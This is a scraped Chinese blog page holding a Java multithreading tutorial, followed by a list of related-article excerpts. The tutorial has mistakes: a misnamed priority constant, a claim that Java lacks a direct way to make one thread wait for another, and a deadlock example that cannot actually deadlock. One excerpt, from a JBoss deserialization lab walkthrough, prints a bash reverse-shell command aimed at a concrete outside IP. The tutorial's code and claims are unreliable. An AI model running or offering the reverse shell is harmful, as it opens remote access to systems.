做会所网站的/抖音推广公司
一、进程与线程
(一)进程的概述
进程是程序的一次执行过程,是系统进行资源分配和调度的一个独立单位。每个进程都有自己独立的内存空间,包括代码、数据和运行时的环境。进程的执行需要系统为其分配各种资源,如 CPU 时间、内存空间、文件描述符等。
(二)线程的概述
线程是进程中的一个执行单元,是操作系统能够进行运算调度的最小单位。一个进程可以包含多个线程,这些线程共享进程的内存空间和资源,同时又有各自独立的执行路径。线程的创建和切换比进程更加轻量级,因此在多任务处理中,线程的使用可以提高系统的并发性和效率。
二、线程的创建
(一)继承Thread类创建多线程
通过继承 java.lang.Thread 类来创建一个线程。具体步骤如下:
1.定义一个子类继承 Thread 类。
2.重写 Thread 类的 run () 方法,在 run () 方法中编写线程要执行的任务代码。
3.创建子类的实例对象。
4.调用实例对象的 start () 方法启动线程。
public class MyThread extends Thread {@Overridepublic void run() {System.out.println("继承 Thread 类创建多线程。");}
}public class ThreadCreationExample {public static void main(String[] args) {MyThread thread = new MyThread();thread.start();}
}
(二)实现Runnable接口创建多线程
实现 java.lang.Runnable 接口也是创建线程的一种方式。步骤如下:
1.定义一个类实现 Runnable 接口。
2.实现 Runnable 接口中的 run () 方法,在 run () 方法中编写线程要执行的任务代码。
3.创建实现类的实例对象。
4.将实例对象作为参数传递给 Thread 类的构造方法,创建 Thread 对象。
5.调用 Thread 对象的 start () 方法启动线程。
public class MyRunnable implements Runnable {@Overridepublic void run() {System.out.println("实现 Runnable 接口创建多线程。");}
}public class RunnableCreationExample {public static void main(String[] args) {MyRunnable runnable = new MyRunnable();Thread thread = new Thread(runnable);thread.start();}
}
(三)实现Callable接口创建多线程
实现 java.util.concurrent.Callable 接口可以创建有返回值的线程。步骤如下:
1.定义一个类实现 Callable 接口,并指定返回值类型。
2.实现 Callable 接口中的 call () 方法,在 call () 方法中编写线程要执行的任务代码,并返回结果。
3.创建实现类的实例对象。
4.将实例对象作为参数传递给 java.util.concurrent.ExecutorService 的 submit () 方法,提交任务并返回一个 Future 对象。
5.可以通过 Future 对象的 get () 方法获取线程的执行结果。
public class MyCallable implements Callable<String> {@Overridepublic String call() throws Exception {return "实现 Callable 接口创建的线程返回的结果。";}
}public class CallableCreationExample {public static void main(String[] args) throws ExecutionException, InterruptedException {MyCallable callable = new MyCallable();FutureTask<String> futureTask = new FutureTask<>(callable);Thread thread = new Thread(futureTask);thread.start();String result = futureTask.get();System.out.println(result);}
}
三、线程的生命周期及状态转换
(一)新建状态
当一个线程对象被创建后,它就处于新建状态。此时线程还没有开始执行,仅仅是一个对象的存在。
(二)可运行状态
当线程对象调用 start () 方法后,线程进入可运行状态。在这个状态下,线程可能正在运行,也可能在等待 CPU 时间片。
(三)锁阻塞状态
当线程试图获取一个被其他线程占用的锁时,它会进入锁阻塞状态。直到锁被释放,线程才能重新进入可运行状态。
(四)无限等待状态
当线程调用了某些方法,如 Object.wait ()、Thread.join () 等,线程会进入无限等待状态。在这个状态下,线程会一直等待,直到被其他线程唤醒。
(五)计时等到状态
当线程调用了某些带有超时时间的方法,如 Object.wait (long timeout)、Thread.join (long millis) 等,线程会进入计时等到状态。如果在超时时间内没有被唤醒,线程会自动进入可运行状态。
(六)被终止状态
当线程的 run () 方法执行完毕或者线程被中断,线程会进入被终止状态。此时线程不再执行任何任务,并且不能再被启动。
四、线程操作的相关方法
(一)线程优先级
优先级常量 | 功能描述 |
static int MAX_PRIORITY | 表示线程的最高优先级,值为10 |
static int MIX_PRIORITY | 表示线程的最低优先级,值为1 |
static int NORM_PRIORITY | 表示线程的默认优先级,值为5 |
Thread thread1 = new Thread(() -> System.out.println("线程 1"));
Thread thread2 = new Thread(() -> System.out.println("线程 2"));
thread1.setPriority(Thread.MIN_PRIORITY);
thread2.setPriority(Thread.MAX_PRIORITY);
thread1.start();
thread2.start();
(二)线程休眠
线程可以通过 Thread.sleep (long millis) 方法进入休眠状态,指定的时间过后,线程会自动唤醒并进入可运行状态。
Thread thread = new Thread(() -> {try {System.out.println("线程开始执行");Thread.sleep(2000);System.out.println("线程休眠 2 秒后继续执行");} catch (InterruptedException e) {e.printStackTrace();}
});
thread.start();
(三)线程插队
在 Java 中没有直接的线程插队方法,但是可以通过设置线程优先级来影响线程的执行顺序。优先级高的线程可能会在某些情况下 “插队” 先执行。
(四)线程让步
线程可以通过 Thread.yield () 方法主动让出 CPU 时间片,让其他同优先级的线程有机会执行。但是不能保证让步后的线程一定不会再次被调度执行。
Thread thread = new Thread(() -> {for (int i = 0; i < 5; i++) {System.out.println("线程执行中");Thread.yield();}
});
thread.start();
(五)线程中断
可以通过调用线程的 interrupt () 方法来中断一个线程。被中断的线程可以通过 isInterrupted () 方法来检查自己是否被中断,并根据需要进行相应的处理。
Thread thread = new Thread(() -> {while (!Thread.currentThread().isInterrupted()) {System.out.println("线程执行中");}System.out.println("线程被中断");
});
thread.start();
try {Thread.sleep(1000);
} catch (InterruptedException e) {e.printStackTrace();
}
thread.interrupt();
五、线程同步
(一)线程安全
当多个线程同时访问共享资源时,如果不进行同步控制,可能会导致数据不一致等问题。确保在多线程环境下正确处理对共享资源的并发访问就是线程安全。
(二)同步代码块
synchronized (lock) {处理共享资源的代码块
}
(三)同步方法
//synchronized 返回值类型 方法名([参数列表]){}public class Counter {private int count = 0;public synchronized void increment() {count++;}public int getCount() {return count;}
}public class SynchronizedMethodExample {public static void main(String[] args) {Counter counter = new Counter();Thread thread1 = new Thread(counter::increment);Thread thread2 = new Thread(counter::increment);thread1.start();thread2.start();try {thread1.join();thread2.join();} catch (InterruptedException e) {e.printStackTrace();}System.out.println(counter.getCount());}
}
(四)死锁问题
当两个或多个线程相互等待对方持有的资源,而导致所有线程都无法继续执行的情况称为死锁。为了避免死锁,在设计多线程程序时,应该尽量避免多个线程同时持有多个锁,并且要确保在获取锁的顺序上是一致的。同时,应该及时释放不再需要的锁,避免资源的长时间占用。
public class ResourceA {public synchronized void useA(ResourceB resourceB) {System.out.println("线程持有资源 A,尝试获取资源 B");resourceB.useB();}
}public class ResourceB {public synchronized void useB() {System.out.println("线程持有资源 B,尝试获取资源 A");}
}public class DeadlockExample {public static void main(String[] args) {ResourceA resourceA = new ResourceA();ResourceB resourceB = new ResourceB();Thread thread1 = new Thread(() -> resourceA.useA(resourceB));Thread thread2 = new Thread(() -> resourceB.useB());thread1.start();thread2.start();}
}
相关文章:

多线程相关内容
一、进程与线程 (一)进程的概述 进程是程序的一次执行过程,是系统进行资源分配和调度的一个独立单位。每个进程都有自己独立的内存空间,包括代码、数据和运行时的环境。进程的执行需要系统为其分配各种资源,如 CPU 时间、内存空间、文件描述符…...

mybatis-puls快速入门
1.概述 在真实项目开发中我们的服务模块,一般都要进行数据库操作,并且每个domain都有crud,需多次写重复代码。我们使用MybatisPlus,就不用写重复代码,并且还有模板的功能,可以一键生成daomin,query,mapper…...

Pool 和 PG 架构(二)
Ceph 的存储架构设计旨在提供高可用性和可扩展性。其中,Pool(存储池)和 PG(放置组)是两个核心概念。下面详细介绍 Ceph 的 Pool 和 PG 架构以及它们之间的关系。 1. Pool池 概念: Pool(存储池…...

客户服务升级指南:如何以细节赢得客户忠诚
在当今这个竞争激烈的市场环境中,客户忠诚度已成为企业生存与发展的关键所在。而要想赢得并维持客户的忠诚,仅凭优质的产品或服务已远远不够,更需要企业在客户服务上下足功夫,从每一个细节入手,打造超越客户期待的服务…...

闲盒支持的组网方式和注意事项
1. 直连光猫拨号 通过光猫拨号,设备直连光猫的设备,需要对光猫开启UPNP并关闭DMZ 如果只接一个盒子,建议直接针对盒子IP开dmz。 2. 直连路由器 通过路由器拨号,设备直连路由器的设备,需要对路由器开启UPNP并关闭…...

828华为云征文|华为云Flexus云服务器X实例之openEuler系统下搭建MaxKB开源知识库问答系统
828华为云征文|华为云Flexus云服务器X实例之openEuler系统下搭建MaxKB开源知识库问答系统 前言一、Flexus云服务器X实例介绍1.1 Flexus云服务器X实例简介1.2 Flexus云服务器X实例特点1.3 Flexus云服务器X实例使用场景 二、MaxKB 介绍2.1 MaxKB简介2.2 MaxKB整体架构…...

[Linux]:信号(上)
✨✨ 欢迎大家来到贝蒂大讲堂✨✨ 🎈🎈养成好习惯,先赞后看哦~🎈🎈 所属专栏:Linux学习 贝蒂的主页:Betty’s blog 1. 信号的引入 1.1 信号的概念 在Linux系统中,信号(…...

浙大数据结构:05-树9 Huffman Codes
这道题难度挺大,写起来较为费劲,这里我依然使用了STL库,使得代码量大幅减少不过百行,便于大家理解。 机翻: 1、条件准备 数组存储字符对应频率,n,student存储输入多少字符,有多少学生测试。 …...

scrapy爬虫基础
一、初识 创建项目: scrapy startproject my_one_project # 创建项目命令 cd my_one_project # 先进去, 后面在里面运行 运行爬虫命令为:scrapy crawl tk spiders下创建test.py 其中name就是scrapy crawl tk &…...

利用H5无插件播放RTSP流的实现方案
文章目录 0. 引言1. 问题分析1.1 RTSP流与浏览器的兼容性1.2 解决思路 2. 方案设计2.1 总体架构2.2 关键组件 3. 实施步骤3.1 环境准备3.2 安装与配置3.2.1 安装FFmpeg3.2.2 安装OpenResty3.2.3 添加nginx-rtmp-module模块3.2.4 配置OpenResty 3.3 推流操作3.4 前端播放3.4.1 引…...

CSS文本格式化
通过 CSS 中的文本属性您可以像操作 Word 文档那样定义网页中文本的字符间距、对齐方式、缩进等等,CSS 中常用的文本属性如下所示: text-align:设置文本的水平对齐方式;text-decoration:设置文本的装饰;te…...

python的 __name__和__doc__属性
__name__属性 __name__属性 用于判断当前模块是不是程序入口,如果当前程序正在使用,__name__的值为__main__。 在编写程序时,通常需要给每个模块添加条件语句,用于单独测试该模块的功能。 每个模块都有一个名称,当一…...

Go语言中的Mutex实现探讨
解锁Python编程的无限可能:《奇妙的Python》带你漫游代码世界 在并发编程中,互斥锁(Mutex)是一个重要的工具,它帮助我们控制多个协程对共享资源的访问,从而防止数据竞争和不一致性。本文将深入探讨Go语言中Mutex的实现历程和使用方式,同时分享在处理并发问题时的思路与…...

第五届计算机科学与管理科技国际学术会议(ICCSMT 2024)
梁哲,同济大学长聘特聘教授,国家杰青、首届国家杰青延续项目获得者、上海市曙光学者、上海市优秀学术带头人。本科毕业于新加坡国立大计算机工程系、硕士毕业于新加坡国立大学工业与系统工程系、博士毕业于美国新泽西州立大学工业工程系。理论研究主要集…...

【machine learning-13-线性回归的向量化】
向量化 向量化简洁并行计算 向量化 线性回归的向量化表示如下,其中w 和 x 都分别加了箭头表示这是个向量,后续不加也可以表示为向量,w和x点乘加上b,就构成了多元线性回归的表达方式,如下: 那么究竟为什么…...

【CSS|第2期】探索HTML与CSS中的文档流:从自然流到高级布局技巧
日期:2024年9月9日 作者:Commas 签名:(ง •_•)ง 积跬步以致千里,积小流以成江海…… 注释:如果您觉在这里插入代码片得有所帮助,帮忙点个赞,也可以关注我,我们一起成长;如果有不对…...

MATLAB绘图基础9:多变量图形绘制
参考书:《 M A T L A B {\rm MATLAB} MATLAB与学术图表绘制》(关东升)。 9.多变量图形绘制 9.1 气泡图 气泡图用于展示三个或更多变量变量之间的关系,气泡图的组成要素: 横轴( X {\rm X} X轴):表示数据集中的一个变量,…...

JBOSS中间件漏洞复现
CVE-2015-7501 1.开启环境 cd vulhub/jboss/JMXInvokerServlet-deserialization docker-compose up -d docker ps 2.访问靶场 3.访问/invoker/JMXInvokerServlet目录 4.将反弹shell进⾏base64编码 bash -i >& /dev/tcp/47.121.191.208/6666 0>&1 YmFzaCAt…...

每日论文6—16ISCAS一种新型低电流失配和变化电流转向电荷泵
《A Novel Current Steering Charge Pump with Low Current Mismatch and Variation》16ISCAS 本文首先介绍了传统的current steering charge pump,如下图: 比起最简单的电荷泵,主要好处是UP和DN开关离输出节点较远,因此一定程度…...

低代码开发平台:未来五大发展趋势预测
在数字化转型的浪潮中,低代码开发平台正迅速崛起,成为企业软件开发的重要工具。随着技术的不断进步和市场需求的持续增长,低代码开发平台在未来将展现出更为广阔的发展前景。本文将预测并探讨低代码开发平台的五大发展趋势。 深度融合数字化与…...

国内AI大模型,这篇文章说透了
探索国内顶尖AI企业及其创新产品。 人工智能(AI)的发展正以前所未有的速度推进。 从简单的自动化任务到复杂的决策制定、自然语言处理、图像识别及自主系统的实现,不断拓宽着人类智慧的边界。 国内AI发展迅猛,不仅在理论研究上…...

3.4 爬虫实战-爬去智联招聘职位信息
课程目标 爬去智联招聘 课程内容 import requests from bs4 import BeautifulSoup from tqdm import tqdm import pandas as pd import time def tran_salary(ori_salary):if "万" in ori_salary:ori_salary ori_salary.replace("万","")ori…...

Java 之注解详解
Java 注解(Annotation)自 Java 5 版本引入,为代码提供了强大的元数据支持。它们如同代码中的标记,能够被编译器、工具和运行时环境识别,赋予代码更丰富的语义和更强大的功能。 一、注解入门 1.1 初识注解:…...

计算机视觉实战项目4(图像分类+目标检测+目标跟踪+姿态识别+车道线识别+车牌识别+无人机检测+A*路径规划+单目测距与测速+行人车辆计数等)
往期热门项目回顾: 计算机视觉项目大集合 改进的yolo目标检测-测距测速 路径规划算法 图像去雨去雾目标检测测距项目 交通标志识别项目 yolo系列-重磅yolov9界面-最新的yolo 姿态识别-3d姿态识别 深度学习小白学习路线 AI健身教练-引体向上-俯卧撑计数…...

【Spring Cloud】Spring Cloud 概述
Spring Cloud 概述 1. 认识微服务1.1 单体架构1.2 集群和分布式架构集群和分布式 1.3 微服务架构分布式架构&微服务架构 1.4 微服务带来的挑战优势挑战 2. 微服务解决⽅案- Spring Cloud2.1 什么是Spring Cloud2.2 Spring Cloud版本Spring Cloud和SpringBoot的关系 2.3 Spr…...

猫头虎带你解决:error Error: certificate has expired
🐯猫头虎带你解决:error Error: certificate has expired 💥 今天有粉丝问猫哥:“🐯猫头虎,我在 Node.js 项目中使用 Yarn 安装包时遇到了一个错误:Error: certificate has expired。你能帮忙解…...

盘点2024年4款高效率的语音转文字工具。
语音转换文字软件真的是一种提高效率的神器,我在工作中常常因为手动记录太慢而选择录音。事后在形成记录,但效率比较低。自从知道有直接转换的工具之后,我有再多的录音都不怕了。如果大家也有跟我一样的工作时,可以试试使用这些语…...

记录Mac编译Android源码踩过的坑
学习Android源码,如果电脑配置还不错,最好还是下载一套源码,经过编译后导入到Android Studio中来学习,这样会更加的直观,代码之间的跳转查看会更加方便。因此,笔者决定下载并编译一套源码,以利于…...

C++ 数据结构算法细节相关
细节 队列 这段代码实现的是二叉树的层序遍历,也就是按照树的层次,一层一层地遍历节点。下面我会为你详细解释这段代码。 queue <TreeNode*> q; 这是一个队列,队列中存放的是指向TreeNode的指针。队列(queue)是…...

【HTML5】html5开篇基础(1)
1.❤️❤️前言~🥳🎉🎉🎉 Hello, Hello~ 亲爱的朋友们👋👋,这里是E绵绵呀✍️✍️。 如果你喜欢这篇文章,请别吝啬你的点赞❤️❤️和收藏📖📖。如果你对我的…...